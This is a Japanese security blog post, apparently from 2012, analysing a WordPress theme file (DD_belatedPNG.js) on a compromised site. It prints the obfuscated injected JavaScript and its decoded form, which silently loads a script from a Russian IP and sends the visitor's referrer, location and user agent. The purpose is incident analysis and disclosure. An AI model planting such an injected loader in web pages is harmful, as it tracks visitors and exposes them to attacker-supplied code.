金曜日, 9月 21, 2012

#OCJP-063: 「182.48.9.228/glamb.sakura.ne.jp」の変な感染コード…

では、さくっと!下記のURL↓
h00p://glamb.sakura.ne.jp/glamb_shop/wd/wp-content/themes/main-fi
es/humax/js/DD_belatedPNG.js
ダウンロードしたら↓
//fetch...
--21:27:39--  h00p://glamb.sakura.ne.jp/glamb_shop/wd/wp-content/themes/main-fi
es/humax/js/DD_belatedPNG.js
           => `DD_belatedPNG.js'
Resolving glamb.sakura.ne.jp... 182.48.9.228
Connecting to glamb.sakura.ne.jp|182.48.9.228|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 14,576 (14K) [application/javascript]
100%[====================================>] 14,576        --.--K/s
21:27:41 (325.37 KB/s) - `DD_belatedPNG.js' saved [14576/14576]
下記のコードを発見↓
// contanins what looks like malicious code in DD_belatedPNG.js 
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\
x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28
\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2
  :
C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","
","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x
3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x
3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--){_0
xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString
(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];
_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if
(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_
0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _
0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
解けたら↓
element=document.getElementById('dgllhguk');if(!element){hghjghjhjgjh=document.
location;hghjhjhjg=escape(document.referrer);ugkkjkj=escape(navigator.userAgent
);var js=document.createElement('script');js.id='dgllhguk';js.src='h00p://91.19
6.216.64/s.php?ref='+hghjhjhjg+'&lc='+hghjghjhjgjh+'&ua='+ugkkjkj;var head=docu
ment.getElementsByTagName('head')[0];head.appendChild(js)}
読みにくい…、綺麗にすると↓
element=document.getElementById('dgllhguk');
 if(!element)
 {
   hghjghjhjgjh=document.location;
   hghjhjhjg=escape(document.referrer);
   ugkkjkj=escape(navigator.userAgent);
   var js=document.createElement('script');
   js.id='dgllhguk';
   js.src='h00p://91・196・216・64/s.php?ref='+hghjhjhjg+'&lc='+hghjghjhjgjh+'&ua='+ugkkjkj;
   var head=document.getElementsByTagName('head')[0];
   head.appendChild(js) }
もう少し頑張ったら↓
h00p://91・196・216・64/s.php?ref=referrer&cls=colorDepth&\
      sw=width&sh=height&dc=charset&lc=location&ua=userAgent
↑びみような感じ…こんなコードだけだと何故か汚いやり方でやったわけかよ… 何物かと…
IP:             91.196.216.64  //ロシア
inetnum:        91.196.216.0 - 91.196.219.255
netname:        SPETSENERGO-NET
descr:         SpetsEnergo Ltd.
現在は:
91.196.216.64 [host down]
になった。

0 件のコメント:

コメントを投稿